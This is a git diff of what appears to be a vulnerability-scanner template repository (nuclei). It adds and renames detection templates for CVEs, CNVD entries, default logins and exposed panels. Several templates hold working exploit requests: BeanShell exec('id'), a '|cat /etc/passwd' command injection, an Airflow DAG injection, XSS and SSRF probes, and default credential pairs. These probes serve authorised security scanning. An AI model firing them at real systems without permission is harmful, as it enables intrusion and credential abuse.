diff --git a/README.md b/README.md
index 876f6deb25..5ed60f9fa1 100644
--- a/README.md
+++ b/README.md
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 |
-| takeovers | 67 | exposures | 104 | technologies | 77 |
-| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 |
-| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
-| fuzzing | 9 | helpers | 8 | iot | 12 |
+| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
+| takeovers | 67 | exposures | 105 | technologies | 98 |
+| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
+| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
+| fuzzing | 9 | helpers | 8 | iot | 13 |
-**108 directories, 1148 files**.
+**111 directories, 1207 files**.
diff --git a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml b/cnvd/CNVD-2019-01348.yaml
similarity index 94%
rename from vulnerabilities/other/xiuno-bbs-reinstallation.yaml
rename to cnvd/CNVD-2019-01348.yaml
index fd4ad35902..4102e9234e 100644
--- a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml
+++ b/cnvd/CNVD-2019-01348.yaml
@@ -1,11 +1,12 @@
-id: xiuno-bbs-reinstallation
+id: CNVD-2019-01348
+
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
- tags: xiuno
+ tags: xiuno,cnvd
requests:
- method: GET
diff --git a/vulnerabilities/other/xunchi-file-read.yaml b/cnvd/CNVD-2020-23735.yaml
similarity index 85%
rename from vulnerabilities/other/xunchi-file-read.yaml
rename to cnvd/CNVD-2020-23735.yaml
index cc804905e3..88cf7d0df7 100644
--- a/vulnerabilities/other/xunchi-file-read.yaml
+++ b/cnvd/CNVD-2020-23735.yaml
@@ -1,16 +1,18 @@
-id: xunchi-file-read
+id: CNVD-2020-23735
+
info:
- name: Xxunchi LFR (CNVD-2019-01348
+ name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
- tags: xunchi,lfi
+ tags: xunchi,lfi,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
+
matchers-condition: and
matchers:
- type: status
@@ -21,4 +23,4 @@ requests:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
- condition: and
+ condition: and
\ No newline at end of file
diff --git a/default-logins/smartweb/ruijie-smartweb-default-password.yaml b/cnvd/CNVD-2020-56167.yaml
similarity index 90%
rename from default-logins/smartweb/ruijie-smartweb-default-password.yaml
rename to cnvd/CNVD-2020-56167.yaml
index 099edceff0..1fe06f6c1c 100644
--- a/default-logins/smartweb/ruijie-smartweb-default-password.yaml
+++ b/cnvd/CNVD-2020-56167.yaml
@@ -1,11 +1,11 @@
-id: ruijie-smartweb-default-password
+id: CNVD-2020-56167
info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
- tags: ruijie,default-login
+ tags: ruijie,default-login,cnvd
requests:
- method: POST
diff --git a/vulnerabilities/other/CNVD-2020-62422.yaml b/cnvd/CNVD-2020-62422.yaml
similarity index 94%
rename from vulnerabilities/other/CNVD-2020-62422.yaml
rename to cnvd/CNVD-2020-62422.yaml
index 19715aaafb..736770f82c 100644
--- a/vulnerabilities/other/CNVD-2020-62422.yaml
+++ b/cnvd/CNVD-2020-62422.yaml
@@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
- tags: lfi
+ tags: lfi,cnvd
requests:
- method: GET
diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/cnvd/CNVD-2020-68596.yaml
similarity index 95%
rename from vulnerabilities/other/weiphp-path-traversal.yaml
rename to cnvd/CNVD-2020-68596.yaml
index b50c3ba268..9f1c78f053 100644
--- a/vulnerabilities/other/weiphp-path-traversal.yaml
+++ b/cnvd/CNVD-2020-68596.yaml
@@ -1,11 +1,11 @@
-id: weiphp-path-traversal
+id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
- tags: weiphp,lfi
+ tags: weiphp,lfi,cnvd
requests:
- raw:
diff --git a/exposures/configs/eea-disclosure.yaml b/cnvd/CNVD-2021-10543.yaml
similarity index 90%
rename from exposures/configs/eea-disclosure.yaml
rename to cnvd/CNVD-2021-10543.yaml
index 459b5ea63a..a29fe66f5a 100644
--- a/exposures/configs/eea-disclosure.yaml
+++ b/cnvd/CNVD-2021-10543.yaml
@@ -1,11 +1,11 @@
-id: eea-disclosure
+id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
- tags: config,exposure
+ tags: config,exposure,cnvd
requests:
- method: GET
diff --git a/exposures/configs/ruijie-smartweb-disclosure.yaml b/cnvd/CNVD-2021-17369.yaml
similarity index 90%
rename from exposures/configs/ruijie-smartweb-disclosure.yaml
rename to cnvd/CNVD-2021-17369.yaml
index 47bf5c2ed1..8377c8296c 100644
--- a/exposures/configs/ruijie-smartweb-disclosure.yaml
+++ b/cnvd/CNVD-2021-17369.yaml
@@ -1,11 +1,11 @@
-id: ruijie-smartweb-disclosure
+id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
- tags: ruijie,disclosure
+ tags: ruijie,disclosure,cnvd
requests:
- method: GET
diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml
new file mode 100644
index 0000000000..4302b87a88
--- /dev/null
+++ b/cnvd/CNVD-2021-30167.yaml
@@ -0,0 +1,45 @@
+id: CNVD-2021-30167
+
+info:
+ name: UFIDA NC BeanShell Remote Code Execution
+ author: pikpikcu
+ severity: high
+ reference: |
+ - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
+ - https://www.cnvd.org.cn/webinfo/show/6491
+ tags: beanshell,rce,cnvd
+
+requests:
+ - raw:
+ - | #linux
+ POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+ Content-Type: application/x-www-form-urlencoded
+
+ bsh.script=exec("id");
+
+ - | #windows
+ POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+ Content-Type: application/x-www-form-urlencoded
+
+ bsh.script=exec("ipconfig");
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "uid="
+ - "Windows IP"
+ condition: or
+
+ - type: word
+ words:
+ - "BeanShell Test Servlet"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
new file mode 100644
index 0000000000..f72453f16f
--- /dev/null
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -0,0 +1,32 @@
+id: CVE-2017-14535
+
+info:
+ name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
+ author: pikpikcu
+ severity: high
+ reference: |
+ - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
+ - https://www.exploit-db.com/exploits/49913
+ tags: cve,cve2017,trixbox,rce
+
+requests:
+ - raw:
+ - |
+ GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: de,en-US;q=0.7,en;q=0.3
+ Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
+ Connection: close
+ Cache-Control: max-age=0
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
new file mode 100644
index 0000000000..f37b6660e4
--- /dev/null
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -0,0 +1,21 @@
+id: CVE-2017-3528
+
+info:
+ name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
+ author: 0x_Akoko
+ severity: low
+ reference: |
+ - https://blog.zsec.uk/cve-2017-3528/
+ - https://www.exploit-db.com/exploits/43592
+ tags: oracle,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
+
+ matchers:
+ - type: word
+ words:
+ - 'noresize src="/\example.com?configName='
+ part: body
\ No newline at end of file
diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml
index ff41ff3d83..0aec140f4e 100644
--- a/cves/2018/CVE-2018-0296.yaml
+++ b/cves/2018/CVE-2018-0296.yaml
@@ -11,12 +11,16 @@ requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
+ headers:
+ Accept-Encoding: deflate
+
matchers-condition: and
matchers:
- type: word
words:
- "///sessions"
part: body
+
- type: status
status:
- 200
diff --git a/exposures/logs/circarlife-system-log.yaml b/cves/2018/CVE-2018-12634.yaml
similarity index 88%
rename from exposures/logs/circarlife-system-log.yaml
rename to cves/2018/CVE-2018-12634.yaml
index 5567438fa5..ac652812c9 100644
--- a/exposures/logs/circarlife-system-log.yaml
+++ b/cves/2018/CVE-2018-12634.yaml
@@ -1,4 +1,4 @@
-id: circarlife-system-log
+id: CVE-2018-12634
info:
name: Exposed CirCarLife System Log
@@ -6,7 +6,7 @@ info:
description: CirCarLife is an internet-connected electric vehicle charging station
reference: https://circontrol.com/
severity: medium
- tags: scada,circontrol,circarlife,logs
+ tags: cve,cve2018,scada,circontrol,circarlife,logs
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
new file mode 100644
index 0000000000..0b7751f18a
--- /dev/null
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -0,0 +1,64 @@
+id: CVE-2020-11978
+info:
+ name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+ author: pdteam
+ severity: high
+ description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+ reference: |
+ - https://github.com/pberba/CVE-2020-11978
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+ - https://twitter.com/wugeej/status/1400336603604668418
+ tags: cve,cve2020,apache,airflow,rce
+
+requests:
+ - raw:
+ - |
+ GET /api/experimental/test HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Content-Length: 85
+ Content-Type: application/json
+
+ {"conf": {"message": "\"; touch test #"}}
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+
+ extractors:
+ - type: regex
+ name: exec_date
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - '"execution_date":"([0-9-A-Z:+]+)"'
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_4, "operator":"BashOperator")'
+ - 'contains(all_headers_4, "application/json")'
+ condition: and
\ No newline at end of file
diff --git a/misconfiguration/airflow-api-exposure.yaml b/cves/2020/CVE-2020-13927.yaml
similarity index 52%
rename from misconfiguration/airflow-api-exposure.yaml
rename to cves/2020/CVE-2020-13927.yaml
index 2d73efdfce..0a5d03ba2a 100644
--- a/misconfiguration/airflow-api-exposure.yaml
+++ b/cves/2020/CVE-2020-13927.yaml
@@ -1,18 +1,20 @@
-id: airflow-api-exposure
+id: CVE-2020-13927
info:
- name: Apache Airflow API Exposure / Unauthenticated Access
+ name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
- tags: apache,airflow,unauth
+ tags: cve,cve2020,apache,airflow,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/api/experimental/latest_runs'
+
matchers:
- type: word
words:
- '"dag_run_url":'
- - '{"items":['
+ - '"dag_id":'
+ - '"items":'
condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
index 4969235916..142c4a081a 100644
--- a/cves/2020/CVE-2020-36112.yaml
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
- description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
+ description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
new file mode 100644
index 0000000000..a0bb988cd8
--- /dev/null
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-6308
+
+info:
+ name: Unauthenticated Blind SSRF in SAP
+ author: madrobot
+ severity: medium
+ reference: https://github.com/InitRoot/CVE-2020-6308-PoC
+ tags: cve,cve2020,sap,ssrf,oob
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
+
+ body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml
new file mode 100644
index 0000000000..5271910e78
--- /dev/null
+++ b/cves/2021/CVE-2021-21985.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-21985
+
+info:
+ name: VMware vSphere Client (HTML5) RCE
+ author: D0rkerDevil
+ severity: critical
+ description: |
+ The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21985
+ - https://www.vmware.com/security/advisories/VMSA-2021-0010.html
+ - https://github.com/alt3kx/CVE-2021-21985_PoC
+ tags: cve,cve2021,rce,vsphere
+
+requests:
+ - raw:
+ - |
+ POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/json
+ Content-Length: 86
+ Connection: close
+
+ {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
+
+ matchers:
+ - type: word
+ words:
+ - '{"result":{"isDisconnected":'
+ part: body
diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml
index 60c70d0949..213b811b3d 100644
--- a/cves/2021/CVE-2021-22122.yaml
+++ b/cves/2021/CVE-2021-22122.yaml
@@ -23,6 +23,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
+ - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
matchers-condition: and
matchers:
- type: word
@@ -30,4 +31,4 @@ requests:
- "nuclei"
- "No policy has been chosen."
condition: and
- part: body
\ No newline at end of file
+ part: body
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
new file mode 100644
index 0000000000..00b724d223
--- /dev/null
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24316
+
+info:
+ author: 0x_Akoko
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ severity: medium
+ tags: cve,cve2021,mediumish,xss,wordpress
+ reference: |
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml
new file mode 100644
index 0000000000..50bcb9d651
--- /dev/null
+++ b/default-logins/apache/airflow-default-credentials.yaml
@@ -0,0 +1,61 @@
+id: airflow-default-credentials
+
+info:
+ name: Apache Airflow Default Credentials
+ author: pdteam
+ severity: critical
+ tags: airflow,default-login
+ reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
+
+requests:
+ - raw:
+ - |
+ GET /admin/airflow/login HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Connection: close
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.9
+
+ - |
+ POST /admin/airflow/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 152
+ Cache-Control: max-age=0
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}/admin/airflow/login
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-IN,en;q=0.9
+ Connection: close
+
+ username=airflow&password=airflow&_csrf_token={{csrf_token}}
+
+ extractors:
+ - type: regex
+ name: csrf_token
+ group: 1
+ part: body
+ internal: true
+ regex:
+ - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "session=."
+ - "/admin/"
+ part: header
+ condition: and
+
+ - type: word
+ words:
+ - 'You should be redirected automatically to target URL: /admin/'
+ part: body
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml
new file mode 100644
index 0000000000..08f426e7da
--- /dev/null
+++ b/default-logins/arl/arl-default-password.yaml
@@ -0,0 +1,29 @@
+id: arl-default-password
+
+info:
+ name: ARL Default Password
+ author: pikpikcu
+ severity: high
+ tags: arl,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/user/login"
+ headers:
+ Content-Type: application/json; charset=UTF-8
+ body: |
+ {"username":"admin","password":"arlpass"}
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '"message": "success"'
+ - '"username": "admin"'
+ - '"type": "login"'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml
new file mode 100644
index 0000000000..95d6c454af
--- /dev/null
+++ b/default-logins/szhe/szhe-default-password.yaml
@@ -0,0 +1,33 @@
+id: szhe-default-password
+
+info:
+ name: Szhe Default Password
+ author: pikpikcu
+ severity: low
+ tags: szhe,default-login
+ vendor: https://github.com/Cl0udG0d/SZhe_Scan
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/login/"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ email=springbird@qq.com&password=springbird&remeber=true
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - 'You should be redirected automatically to target URL: /'
+
+ - type: word
+ words:
+ - 'Set-Cookie: session'
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml
new file mode 100644
index 0000000000..2c7870a1f1
--- /dev/null
+++ b/dns/dns-waf-detect.yaml
@@ -0,0 +1,172 @@
+id: dns-waf-detect
+
+info:
+ name: DNS WAF Detection
+ author: lu4nx
+ severity: info
+ tags: tech,waf,dns
+
+dns:
+ - name: "{{FQDN}}"
+ type: CNAME
+ recursion: true
+ retries: 5
+ class: inet
+
+ - name: "{{FQDN}}"
+ type: NS
+ recursion: true
+ retries: 5
+ class: inet
+
+ matchers:
+ - type: word
+ name: sanfor-shield
+ words:
+ - ".sangfordns.com"
+
+ - type: word
+ name: 360panyun
+ words:
+ - ".360panyun.com"
+
+ - type: word
+ name: baiduyun
+ words:
+ - ".yunjiasu-cdn.net"
+
+ - type: word
+ name: chuangyudun
+ words:
+ - ".365cyd.cn"
+ - ".cyudun.net"
+
+ - type: word
+ name: knownsec
+ words:
+ - ".jiashule.com"
+ - ".jiasule.org"
+
+ - type: word
+ name: huaweicloud
+ words:
+ - ".huaweicloudwaf.com"
+
+ - type: word
+ name: xinliuyun
+ words:
+ - ".ngaagslb.cn"
+
+ - type: word
+ name: chinacache
+ words:
+ - ".chinacache.net"
+ - ".ccgslb.net"
+
+ - type: word
+ name: nscloudwaf
+ words:
+ - ".nscloudwaf.com"
+
+ - type: word
+ name: wangsu
+ words:
+ - ".wsssec.com"
+ - ".lxdns.com"
+ - ".wscdns.com"
+ - ".cdn20.com"
+ - ".cdn30.com"
+ - ".ourplat.net"
+ - ".wsdvs.com"
+ - ".wsglb0.com"
+ - ".wswebcdn.com"
+ - ".wswebpic.com"
+ - ".wsssec.com"
+ - ".wscloudcdn.com"
+ - ".mwcloudcdn.com"
+
+ - type: word
+ name: qianxin
+ words:
+ - ".360safedns.com"
+ - ".360cloudwaf.com"
+
+ - type: word
+ name: baiduyunjiasu
+ words:
+ - ".yunjiasu-cdn.net"
+
+ - type: word
+ name: anquanbao
+ words:
+ - ".anquanbao.net"
+
+ - type: regex
+ name: aliyun
+ regex:
+ - '\.w\.kunlun\w{2,3}\.com'
+
+ - type: regex
+ name: aliyun-waf
+ regex:
+ - '\.aliyunddos\d+\.com'
+ - '\.aliyunwaf\.com'
+ - '\.aligaofang\.com'
+ - '\.aliyundunwaf\.com'
+
+ - type: word
+ name: xuanwudun
+ words:
+ - ".saaswaf.com"
+ - ".dbappwaf.cn"
+
+ - type: word
+ name: yundun
+ words:
+ - ".hwwsdns.cn"
+ - ".yunduncname.com"
+
+ - type: word
+ name: knownsec-ns
+ words:
+ - ".jiasule.net"
+
+ - type: word
+ name: chuangyudun
+ words:
+ - ".365cyd.net"
+
+ - type: word
+ name: qianxin
+ words:
+ - ".360wzb.com"
+
+ - type: word
+ name: anquanbao
+ words:
+ - ".anquanbao.com"
+
+ - type: word
+ name: wangsu
+ words:
+ - ".chinanetcenter.com"
+
+ - type: word
+ name: baiduyunjiasue
+ words:
+ - ".ns.yunjiasu.com"
+
+ - type: word
+ name: chinacache
+ words:
+ - ".chinacache.com"
+
+ - type: word
+ name: cloudflare
+ words:
+ - "ns.cloudflare.com"
+
+ - type: word
+ name: edns
+ words:
+ - ".iidns.com"
diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml
deleted file mode 100644
index 9130363b09..0000000000
--- a/exposed-panels/airflow-exposure.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: airflow-exposure
-
-info:
- name: Apache Airflow Exposure / Unauthenticated Access
- author: pdteam
- severity: medium
- tags: panel
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- - '{{BaseURL}}/admin/'
- matchers:
- - type: word
- words:
- - 'Airflow - DAGs'
- - ''
- condition: and
\ No newline at end of file
diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml
new file mode 100644
index 0000000000..3b97fec8be
--- /dev/null
+++ b/exposed-panels/airflow-panel.yaml
@@ -0,0 +1,24 @@
+id: airflow-panel
+
+info:
+ name: Airflow Admin login
+ author: pdteam
+ severity: info
+ tags: panel,apache,airflow
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/airflow/login"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "Airflow - Login"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/clave-login-panel.yaml b/exposed-panels/clave-login-panel.yaml
new file mode 100644
index 0000000000..6b10058d50
--- /dev/null
+++ b/exposed-panels/clave-login-panel.yaml
@@ -0,0 +1,23 @@
+id: clave-login-panel
+
+info:
+ name: Clave login panel
+ author: __Fazal
+ severity: info
+ tags: panel,clave
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin.php'
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Clave"
\ No newline at end of file
diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml
new file mode 100644
index 0000000000..15846058a0
--- /dev/null
+++ b/exposed-panels/dotcms-admin-panel.yaml
@@ -0,0 +1,18 @@
+id: dotcms-admin-panel
+
+info:
+ name: dotAdmin Panel
+ author: impramodsargar
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dotAdmin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'dotCMS Content Management Platform'
diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml
new file mode 100644
index 0000000000..85879462c6
--- /dev/null
+++ b/exposed-panels/ems-login-panel.yaml
@@ -0,0 +1,22 @@
+id: ems-login-panel
+
+info:
+ name: EMS Login page detection
+ author: __Fazal
+ severity: info
+ tags: panel,ems
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/EMSWebClient/Login.aspx'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "EMS Web Client - Login"
diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml
new file mode 100644
index 0000000000..6faaf29400
--- /dev/null
+++ b/exposed-panels/lancom-router-panel.yaml
@@ -0,0 +1,22 @@
+id: lancom-router-panel
+
+info:
+ name: Lancom Router Panel
+ author: __Fazal
+ severity: info
+ tags: panel,lancom
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "LANCOM 1790VA-4G"
\ No newline at end of file
diff --git a/exposed-panels/luci-login-detection.yaml b/exposed-panels/luci-login-detection.yaml
new file mode 100644
index 0000000000..0824c5021a
--- /dev/null
+++ b/exposed-panels/luci-login-detection.yaml
@@ -0,0 +1,23 @@
+id: luci-login-detection
+
+info:
+ name: LuCi Login Detector
+ author: aashiq
+ severity: info
+ description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint
+ tags: login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/luci"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Authorization Required"
diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml
new file mode 100644
index 0000000000..c9446f8607
--- /dev/null
+++ b/exposed-panels/openerp-database.yaml
@@ -0,0 +1,22 @@
+id: openerp-database
+
+info:
+ name: OpenERP database instances
+ author: impramodsargar
+ severity: info
+ tags: openerp
+
+requests:
+ - method: GET
